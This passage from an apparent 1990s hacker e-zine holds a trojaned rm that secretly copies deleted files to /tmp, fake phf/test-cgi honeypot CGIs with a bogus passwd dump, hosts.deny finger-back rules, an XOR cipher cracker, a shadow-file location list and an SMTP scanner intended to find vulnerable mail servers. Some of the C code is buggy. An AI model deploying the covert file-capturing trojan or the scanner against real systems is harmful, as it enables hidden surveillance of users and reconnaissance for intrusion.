cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;
-Ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;

-rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;
-Rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;

-rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;
-Rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;

-Rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;
-rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;

-fv)
shift
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -fv $*
;;

-Rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;
-rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;

*)
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak $*
;;
esac

else

IT=$1
cp -f $IT /tmp/fill
/bin/rm.bak $IT
fi
#----------------------------------------------------

You may have to change the line:
doexec /bin/rm.bak -i $*

to:
/bin/rm.bak -i $*
if you do not have doexec which is on linux (or redhat anyway)



Now for rm.c:

/* ------------------------------------------------------ */

/* rm.c -- rm "trojan" by (--==+*~Shok~*+==--) */
/* ------------------------------------------------------ */
/* Email: shok@sekurity.org */

#include <sys/stat.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


void main(int argc, char **argv)
{
struct stat filestats;
int i;
if (argc > 2)
{
if (strcmp("-i", argv[1])==0) goto interactive;
if (strcmp("-f", argv[1])==0) goto force;
if (strcmp("-v", argv[1])==0) goto verbose;
if (strcmp("-r", argv[1])==0) goto recursive;
if (strcmp("-rf", argv[1])==0) goto rf;
if (strcmp("-ri", argv[1])==0) goto ri;
if (strcmp("-rv", argv[1])==0) goto rv;
if (strcmp("-rvf", argv[1])==0) goto rfv;
if (strcmp("-rfv", argv[1])==0) goto rfv;
if (strcmp("-Rvf", argv[1])==0) goto rfv;
if (strcmp("-Rfv", argv[1])==0) goto rfv;
if (strcmp("-frv", argv[1])==0) goto rfv;
if (strcmp("-fvr", argv[1])==0) goto rfv;
if (strcmp("-fRv", argv[1])==0) goto rfv;
if (strcmp("-fvR", argv[1])==0) goto rfv;
if (strcmp("-vfr", argv[1])==0) goto rfv;
if (strcmp("-vrf", argv[1])==0) goto rfv;
if (strcmp("-vfR", argv[1])==0) goto rfv;
if (strcmp("-vRf", argv[1])==0) goto rfv;
if (strcmp("-fr", argv[1])==0) goto rf;
if (strcmp("-ir", argv[1])==0) goto ri;
if (strcmp("-vr", argv[1])==0) goto rv;

if (strcmp("--interactive", argv[1])==0) goto interactive;
if (strcmp("--force", argv[1])==0) goto force;
if (strcmp("--verbose", argv[1])==0) goto verbose;
if (strcmp("--recursive", argv[1])==0) goto recursive;
}

else {
setenv("PROGRAM", argv[1], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
system("/bin/rm.bak $PROGRAM");
unsetenv("PROGRAM");
}


interactive:

lstat(argv[2], &filestats);
for (i=2;i<argc;i++)
{
if (S_ISDIR(filestats.st_mode))
{
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}

else
{
setenv("PROGRAM", argv[2], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}
}


force:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-f",argv[i],NULL);
unsetenv("PROGRAM");

}


verbose:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-v",argv[i],NULL);
unsetenv("PROGRAM");
}

recursive:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-r",argv[i],NULL);
unsetenv("PROGRAM");
}

rf:

for (i=2;i<argc;i++)
{
lstat(argv[i], &filestats);
if (S_ISDIR(filestats.st_mode))
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
}
else
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
}
}


ri:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-ri",argv[i],NULL);
unsetenv("PROGRAM");
}


rv:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-rv",argv[i],NULL);
unsetenv("PROGRAM");
}

rfv:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-rfv",argv[i],NULL);
unsetenv("PROGRAM");
}

}

This program can of course be improved, especially replacing the strcmp's
with getopt() but I could care less....

Now when ever a user deletes something it will first be copied to
/tmp/fill before it's deleted.

Now, even though it's logged to /var/log/httpd/access_log, I'd like to
know right away when someone tries to use the phf or test-cgi
vulnerabilities on me. So I replaced the phf and test-cgi programs in my
/cgi-bin/ with this. The first will get the info on who it is, then it
will send a fake passwd file. This can be improved of course but I don't
care to take the time.

phf.c:


/* ----------------------------------------------------- */
/* phf "trojan" by (--==+*~Shok~*+==--) */
/* ----------------------------------------------------- */
/* Email: shok@sekurity.org */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main()
{

FILE *tmpfile, *fingerinfo;
char *host, *addr, *browser, *query_string;
char fingerbuf[2048];

host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");

/* This is to prevent a finger war, the ip address below is my ip address */
/* just to be on the safe side. But I do have in.fingerd: LOCAL to allow */
/* me to finger without starting a finger war. */
if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0);

system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo1");

tmpfile=fopen("/var/tmp/.phf", "w");
fingerinfo=fopen("/var/tmp/.fingerinfo1", "r");

fprintf(tmpfile, "The following person used phf!!\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tBrowser type: %s\n", browser);
fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string);

fingerinfo=fopen("/var/tmp/.fingerinfo1", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);


fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
fprintf(tmpfile, "--------------------------------------------------\n");
fputs(fingerbuf, tmpfile);

fclose(tmpfile);

system("mail -s \"SOMEONE USED phf!!\" root </var/tmp/.phf");

unlink("/var/tmp/.fingerinfo1");
unlink("/var/tmp/.phf");

printf("Content-type: text/html\n\n");
printf("<H1>Query Results</H1>\n");
printf("<P>\n");
printf("/usr/local/bin/ph -m alias=x \n");
printf("cat /etc/passwd\n");
printf("<PRE>\n");
printf("root:TQoabYuFUSoSk:0:1:Operator:/:/bin/csh\n");
printf("nobody:*:65534:65534::/:\n");
printf("daemon:*:1:1::/:\n");
printf("sys:*:2:2::/:/bin/csh\n");
printf("bin:*:3:3::/bin:\n");
printf("uucp:*:4:8::/var/spool/uucppublic:\n");
printf("news:*:6:6::/var/spool/news:/bin/csh\n");
printf("ingres:*:7:7::/usr/ingres:/bin/csh\n");
printf("mail:*:8:12::/:\n");
printf("johnny:Abx4dgSg:MaTr|x:/home/MaTrix:/bin/sh\n");
printf("audit:*:9:9::/etc/security/audit:/bin/csh\n");
printf("sync::1:1::/:/bin/sync\n");
printf("kill8r:AfBs45Syf:100:25:Siko:/home/Siko:/bin/sh\n");
printf("ppp::70:70:PPP login:/tmp:/etc/ppplogin\n");
printf("sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n");
printf("luseruser:xAFjgodjFa4:254:100:Pr0t0:/home/Pr0t0c0l:/bin/sh\n");
printf("babum:aDtg3Gs645:BiT-#hacker:454:100:/home/BiT:/bin/sh\n");
printf("www:*:30:30:World Wide Web:/home/www:/usr/bin/bash\n");
printf("pop:*:70:70:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
printf("zirzlaff:.a6RPNtUhGW0k:3190:100:Torsten Zirzlaff:/home/tz:/usr/local/bin/tcsh\n");
printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
printf("henrik:v50YvKjFwWw.M:4120:18:HeNriK:/usr/sirius/henrik:/usr/bin/bash\n");
printf("inas:fStcY3^gf:8900:100:InaSaLoser:/home/is:/usr/local/bin/tcsh\n");
printf("ivo:*:8920:100:Da Tru hacker-Lamer:/home/ivo:/usr/local/bin/tcsh\n");
printf("pcguest::7454:100:Temp hax0r account:/tmp:/usr/bin/sh\n");
printf("simone:Em8y0pwT.5umo:8930:100:Simone Kleine:/home/simone:/usr/bin/bash\n");
printf("shko:aDrsBsefYr:666:100:SHLRP:/home/shok:/bin/bash\n");
printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
printf("hammer:FwhX26Hf1:8940:100:Peter Hammerstein:/home/hammer:/usr/bin/bash\n");
printf("patrick:cYz7MXTIyGByQ:8950:100:Patrick Mergell:/home/patrick:/usr/bin/bash\n");
printf("chr:T/SRcchg0fK3I:8960:100:Christian Zemlin:/home/chr:/usr/bin/bash\n");
printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
printf("guest:AefxF2a2D:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n");
printf("</PRE>");
}

This is what the above will show up in the root's mail:


The following person used phf!!

Host: ts037d12.chi-il.concentric.net
Address: 206.173.188.168
User (if able): (null)
Ident (if able): (null)
Browser type: (null)
Query String (aka command entered): Qalias=X%0aid

I did a finger of the person trying to exploit us:
--------------------------------------------------
[206.173.188.168]
(probably Win95 which is why there was no output as Win95 doesn't have an
actual "finger" program)




Now for the test-cgi...this does the same thing accept it will send a
"File Not found" instead:

test-cgi.c:

/* --------------------------------------------------- */
/* test-cgi.c -- test-cgi "trojan" by --==+*~Shok~+*-- */
/* --------------------------------------------------- */
/* Email: shok@sekurity.org */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

void main(void)
{
FILE *tmpfile, *fingerinfo;
char *host *addr, *browser, *query_string;
char fingerbuf[2048];

host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");

/* This is to prevent a finger war, for safety, even though you SHOULD */
/* have in.fingerd: LOCAL in your hosts.allow */

if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0);
system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");

tmpfile=fopen("/var/tmp/.test-cgi", "w");
fprintf(tmpfile, "The following person used phf:\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string);
fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);


fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
fprintf(tmpfile, "--------------------------------------------------\n");
fputs(fingerbuf, tmpfile);

fclose(tmpfile);

/* REPLACE THIS PART WITH WHO YOU WANT TO MAIL IT TO change the root to */
/* to whatever you want */

system("mail -s \"SOMEONE USED test-cgi!!\" root < /var/tmp/.test-cgi");

unlink("/var/tmp/.fingerinfo");
unlink("/var/tmp/.test-cgi");

printf("Content-type: text/html\n\n");
printf("<h2>File Not found\n</h2>");
printf("The requested URL /cgi-bin/test-cgi was not found on this server.");

}



Just as an added bonus here.........
When someone goes to a directory you have .htaccess in, it will send 401,
which is the unauthorized error code (pretty sure it's 401 but not in the
mood to check). Now I editted my srm.conf (usually
/usr/local/etc/httpd/conf/srm.conf), and added this line:

ErrorDocument 401 /cgi-bin/unauthorized.cgi

This is basically like the one above.......except it differs
by the the 'user' part, which lets you know what user it was...this is a
good way to know if there is an unauthorized attempt, and/or what user is
logging into your webpage that is secured......

unauthorized.c:


/* -------------------------------------------------------- */
/* Unauthorized cgi "trojan" script by (--==+*~Shok~*+==--) */
/* -------------------------------------------------------- */
/* Email: shok@sekurity.org */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main(void)
{
FILE *tmpfile, *fingerinfo;
char *host, *addr, *user, *ident, *browser, *query_string;
char fingerbuf[2048];

host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
user=getenv("REMOTE_USER");
ident=getenv("REMOTE_IDENT");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");

/* This can get ugly */
if ((strcmp(addr, "206.71.69.243"))==0) exit(0);

system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");

tmpfile=fopen("/var/tmp/.unauthorized", "w");
fprintf(tmpfile, "The following person has unauthorized access:\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tUser (if able): %s\n", user);
fprintf(tmpfile, "\tIdent (if able): %s\n", ident);
fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);


fprintf(tmpfile, "I did a finger of the person:\n");
fprintf(tmpfile, "-----------------------------\n");
fputs(fingerbuf, tmpfile);

fclose(tmpfile);

system("mail -s \"Somone tried unauthorized access\" root </var/tmp/.unauthorized");

unlink("/var/tmp/.fingerinfo");
unlink("/var/tmp/.unauthorized");

printf("Content-type: text/html\n\n");
printf("<HEAD><TITLE>Unauthorized</TITLE></HEAD>");
printf("<BODY><H1>Unauthorized</H1>");
printf("You are unauthorized and unwanted here.\n Go away <FONT COLOR=\"red\">d0rk</FONT><P>");
printf("</BODY>");

}


Here is my hosts.deny too.........in case you wanted to see it ;)
ALL: .cc.edu: /bin/mail -s "%h from CC.EDU tried to access us!!" root
ALL: .gov, .mil: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "GOV/MIL ATTEMPTED ACCESS from %h!! Using %s." root &
in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root

#FINGER - Noisy people
#------------
in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root &

#Security reasons
#---------------
in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
#in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &

# PORTMAP
#-------------
portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &

#COMSAT
in.comsat: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &

#REXECD
in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &

#RSHD
in.rshd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &

#NNRPD
in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &

#RPCBIND
rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &

#ALL: paranoid


Well.......................................we're winding down to the end.

It has been fun and I don't have much more to say on this article.
Thanks for reading, please feel free to use and distribute this, although
I wish for you to leave my comments and "header" at the tops ... ya know
my "copyright" :)

You can access a few of my things at ftp.janova.org (in pub) or
www.janova.org.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Cryptanalytic Attacks on Repeating Key Algorithms
by The Messiah

CONTENTS:
* Introduction
* Background
* Methods Of Attack
* BadCrypt v1.0
* GeneriCrack for DOS v1.0
* Prevention

INTRODUCTION:
Bruce Schneier published an essay called "Why Crypto Is Harder Than It
Looks."
It's true, designing a secure algorithm is MUCH harder than breaking
one. This article is about breaking programs which use a repeating key.
Credit should go out to Kent Briggs, whose WinCrack program opened doors for
me into cryptanalysis. His code is also at the heart of GeneriCrack for DOS,
altered quite a bit, however.

BACKGROUND:
What is cryptanalwhatever? Cryptanalysis is the art of decoding
encrypted messages without the key, or algorithm. In 1994, PC Mag released a
program by Jeff Prosise called WinCrypt. It created a 512-byte block derived
from a passphrase, then XOR'd (eXclusive OR) each 512-byte block of the
plaintext with the key block.

|------Key Block-----|
XOR
|------Plaintext-----|--------------------|--------------------|--------------------|
equals
|-----Ciphertext-----|



|------Key Block-----|
XOR
|--------------------|------Plaintext-----|--------------------|--------------------|
equals
|--------------------|-----Ciphertext-----|

And so on, until the plaintext is completely XOR'd with the key block. The
problem with this is that is you have a file of all 'A's (Ordinal value=65),
there will be visible repeating patterns in the ciphertext- A PROBLEM! Why is
that a problem, you ask? Someone would have to find that huge 512-byte key to
decrypt it, right? Errnt.

METHODS OF ATTACK:
WinCrypt's weakness is that it uses the same key byte at known points
in the file. The 1st, 513th, 1025th, 1537th, etc byte is always XOR'd with
the same byte of the key. The other bytes in the key have no role in the
encryption of the 1st byte. If the 1st byte of the file is an 'A', and they
1st byte in the key is a 'B', then the result will be a byte value of 3,
regardless of what the other entries in the key are. So instead of a 512-byte
key, it's actually 512 1-byte keys. The keyspace for a 512-byte key would be
2^4096 possibilities, but 512 1-byte keys is just 512*256 (number of entries)
(number of values per entry). 131072 possible keys is quite a bit less to
search. But we don't have to stop there. If we know some common byte values
in the plaintext, we can search for those, like this:

for i = 1 to 512 do
begin
for j = 0 to 255 do
if (InBlock[i] xor j) is in CommonValues then Increment(Count[j]);
end

The highest count will be the byte that has the most hits inside the target
byte range. Text files are made up of mostly spaces (ordinal value 32), CR/LF
pairs (13/10), and lower case letters (well, some l33t0 ph|l3z might have
different values, but hey...).

BADYCRYPT v1.0:

(*
BadCrypt v1.0 by The Messiah
This program takes a 256-byte array, fills it with the output of a
PRNG seeded with the passphrase, then uses the aforementioned
encryption method.
*)

program BadCrypt;

uses Crt;

type
TKey = array[1..256] of byte;

var
key : TKey;
passphrase, inpath, outpath : String;


procedure Crypt(infile, outfile : String);
var
FromF, ToF: file;
NumRead, NumWritten, I: Integer;
Buf: array[1..256] of byte;
begin
Write('Crypting');
Assign(FromF, infile);
Reset(FromF, 1);
Assign(ToF, outfile);
Rewrite(ToF, 1);
repeat
BlockRead(FromF, Buf, SizeOf(Buf), NumRead);
for i := 1 to NumRead do
Buf[i] := Buf[i] xor Key[i];
BlockWrite(ToF, Buf, NumRead, NumWritten);
Write('.');
until (NumRead = 0) or (NumWritten <> NumRead);
Close(FromF);
Close(ToF);
WriteLn('Done!');
end;

procedure Expand(seed : String; var aKey : TKey);
var
I, J : Integer;
begin
Write('Expanding key');
for i := 1 to Length(seed) do
begin
RandSeed := Ord(seed[i]);
for j := 1 to 256 do
aKey[j] := aKey[j] xor Random(256);
Write('.');
end;
WriteLn('Done!');
end;

begin
WriteLn('BadCrypt v1.0: The Worst Encryption Utility!');
Write('Enter the password:

  
');
ReadLn(passphrase);
Write('Enter the filepath for the input file: ');
ReadLn(inpath);
Write('Enter the filepath for the output file: ');
ReadLn(outpath);
Expand(passphrase, Key);
Crypt(inpath, outpath);
WriteLn('Hit enter to quit...');
ReadLn;
end.
{ ------------------------------------------------------ }


GENERICRACK V1.0:

(*
GeneriCrack v1.0 for DOS by The Messiah
This cracks files, if you know the key size it was encrypted with.
A 32-bit version will be out soon, so stick around...
*)
program GeneriCrack;

const
MAXKEY = 1024;

var
key, buffer : array[1..MAXKEY] of Byte;
count, maxcount : array[1..MAXKEY] of Integer;
inpath, outpath : String;
kSize : Integer;

procedure Crack(Filename : String; keysize : Integer);
var
file1: file;
i,j, result: integer;
b : byte;
begin
Write('Cracking');
Assign(file1,Filename);
Reset(file1,1);

for i := 1 to KeySize do
begin
key[i] := 0;
maxcount[i] := 0;
end;

for i:=0 to 255 do
begin
seek(file1,0);
for j := 1 to KeySize do
count[j] := 0;
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do
begin
b:= i xor buffer[j];
if b in [10,13,32,97..122] then count[j] := count[j] + 1;
end;
end;
for j:=1 to keysize do if count[j]>maxcount[j] then
begin
key[j]:=i;
maxcount[j]:=count[j];
end;
Write('.');
end;
WriteLn('Done!');
close(file1);
end;

procedure Decrypt(infile, outfile : String; keysize : Integer);
var
file1,file2: file;
i,j, result: integer;
begin
Write('Decrypting');
assign(file1,infile);
reset(file1,1);
assign(file2,outfile);
rewrite(file2,1);
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do buffer[j]:= buffer[j] xor key[j];
blockwrite(file2,buffer,result,i);
Write('.');
end;
close(file1);
close(file2);
WriteLn('Done!');
end;

begin
WriteLn('GeneriCrack for DOS v1.0 by The Messiah');
Write('Enter the keysize in bytes: ');
ReadLn(kSize);
Write('Enter the filepath of the input file: ');
ReadLn(inpath);
Write('Enter the filepath of the output file: ');
ReadLn(outpath);
Crack(inpath, kSize);
WriteLn;
Decrypt(inpath, outpath, kSize);
WriteLn;
WriteLn('Hit enter to quit...');
ReadLn;
end.
{ ------------------------------------------------------ }

PREVENTION:
One way to make sure an algorithm you're designing (or using) isn't
fallible to this particular attack is to make the encryption data-sensitive.
Have the key change with each block. This will not, of course, make a bad
algorithm good, but it will make it resistant to this particular attack.
Also, if you're running a block cipher in ECB mode, it could be broken with
this attack, AFAIK. I haven't tested it yet, but ECB does the same method for
each block.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Shadow files explained
by Shypht

Ok, a few people I knew / know were a bit confused on the purpose on having
a shadowed password file so I decided to write a simple text explaining
them.

-[ ---------------------------------------------------------------------- ]-
Û²±° Introduction : the basic's °±²Û
-[ ---------------------------------------------------------------------- ]-

A shadow file is a way of adding extra security to a unix machine. Before
password shadowing, a passwd file would look like this :

( this is in /etc/passwd )

esmith:s920Vk02sl24:6151:100:Edmond Smith:/home/esmith:/bin/bash
| | | | | | |
| | | | | | \- which shell they
| | | | | \- home dir use7
| | | | \- real name/comments/bussiness etc
| | | \- group id (gid)
| | \- user id(uid)
| \- encrypted password
\--- login name

but now with computer security becoming more and more of an issue, and more
and more people were grabing the /etc/passwd file and crack the encrypted
password w/ a word list and a cracker like brute force or cracker jack,
john the ripper,crack, etc. The reason why a wordlist/dictionary file
is used is because the encrypted password uses a one-way hash. To crack
the password, the cracker compares the one-way hash from each word in the
word list to the encrypted password until a match is found.

So they decided they needed more security, so they started to shadow
their password files, they still look pretty much the same, but instead
of having the encrypted password, there is a * in place, so if you were
to cat /etc/passwd you'd get :

( location varies on systems see further down for more info )

esmith:*:6151:100:Edmond Smith:/home/esmith:/bin/bash
^- shadowed password file, not much use eh?

people may wonder why wouldn't the system admins make the /etc/passwd
read-only by root and it'd save them alot of hassle, but programs need to
read certain info from that file to get user name / uid / gid etc, and
since not all programs are run as root, if the /etc/passwd was read by root
only, it would cause conflicts, and alot of programs would have to be run
as root and create alot of security problems. So the actual encrypted
password is held in the shadow file, for a list of locations see below,
this file is / should only be read/write only by the root admins, this
gives an extra ammount of security, and since only root can read it, normal
users can't grab a copy and crack the password's in it. The format of the
shadow file goes as :

username:password:change_date:min_change:max_change:warn:inactive:expire:

the format will go into more detail in the next section.

-[ ---------------------------------------------------------------------- ]-
Û²±° The Shadow File : The Format °±²Û
-[ ---------------------------------------------------------------------- ]-

As stated above the format of the shadow file goes as :

username:password:change_date:min_change:max_change:warn:inactive:expire:

User Name : the name of the user
Password : the encrypted password. And/or alternate authontication
methods wich will be explained in the next section.

[ - the following fields relate to passwd change / expiration - ]

Change Date : encodes the date of the most rescent passowrd chage
Min/Max Change : tells the min and max days between password changes
Warn : when the password is about to expire, warn that many
days ahead of time
Inactive : specifies how many days the user has to change thier pass
after the expiration date before that account is cancled
Expire : encodes the date that the password will expire


-[ ---------------------------------------------------------------------- ]-
Û²±° The Shadow File : Extra Features °±²Û
-[ ---------------------------------------------------------------------- ]-

( I read some of this stuff in a document relating to linux security so I am
not sure if it applys to all shadowing systems but I am pretty sure that
it does / or at least should. If not it is still something that is
interesting to know. )

In the password field of the shadow file you can also specify additional
authentication programs to be run after the password has been entered. An
example of one is :

shypht:4j3jx70735;@/sbin/agetest::::::

the ;@/sbin/agetest would tell the system that after the password has been
enter'd in correctly to run the /sbin/agetest program, which I just made up
for an example, and it would return a 0 or 1 showing if the user passed
shypht:<\@>/sbin/securelogin::::::

which the user would have to pass to gain entry to the system,
and he/she would not be prompted for a password. This can be used for lower
or higher security on a system, but I would imagine that it would only be
used to secure the system even more, you could have them prompted for
personal questions which only they would know etc.

-[ ---------------------------------------------------------------------- ]-
Û²±° The Shadow File : Locations °±²Û
-[ ---------------------------------------------------------------------- ]-

The location of the shadow file varies from system to system, I have taken
this list from the ultimate beginers guide to hacking 97 revision. And is
modified for this document.

UNIX Path
-------------------------------------------------
AIX 3 /etc/security/passwd or /tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd
ConvexOS 10 /etc/shadpw
ConvexOS 11 /etc/shadow
DG/UX /etc/tcb/aa/user/
EP/IX /etc/shadow
HP-UX /.secure/etc/passwd
IRIX 5 /etc/shadow
Linux1.1 /etc/shadow
OSF/1 /etc/passwd[.dir|.pag]
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag]
UNICOS /etc/udb
Unix System V /etc/master.passwd

-[ ---------------------------------------------------------------------- ]-
Û²±° Closing Comments °±²Û
-[ ---------------------------------------------------------------------- ]-

I hope that this document helpfull to anyone out there. I wrote this to
help people understand, and maybe learn abit more about the shadow file.
Thanks for reading this far - shypht

-[ ---------------------------------------------------------------------- ]-
Û²±° The End °±²Û
-[ ---------------------------------------------------------------------- ]-
greetz out to : vacuum, cellular fear, philisopher, exorcist, atom, RM,
severed, all my friends in #hackphreak, PentiumRU, Nyangel,
Rloxley, X-Bish and all the other ops, and #carparts and
anyone else I forgot

thanx to vacuum for fixin some spelling and adding the 1way hash info.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
SMTP server scanner
by memor

/*

Here is a SMTP server scanner (thoses ones on port25)
to scan i guess for old mailserver, for easy sendmail bugs uses.

well.. this is not really an hacking tool.. only a scanning one.
it can be used in 2 ways..

USAGE:
smtpscan -dh xxx.xxx[.xxx](if option -h) [port](optional)

first.. to find "possible" hackable domains like that :
smtpscan -d xxx.xxx or smtpscan -d xxx.xxx 25
will scan for smtp from xxx.xxx.1.1 to xxx.xxx.255.1

and 2ndly, it can be used to find "possible" hackable servers on
a domain with :
smtpscan -h xxx.xxx.xxx or smtpscan -h xxx.xxx.xxx 25
will scan for smtp from xxx.xxx.xxx.1 to xxx.xxx.xxx.255

*note*
you can scan for any domains or servers with another port (like for pop3 or
other) with smtpscan -dh xxx.xxx.xxx[.xxx] port
thanx to Wintifax for his advices ;)

memor@mygale.org

memor(hbs) Aug 29, 1997
*/


/* habitual includes for managing functions in the programm */

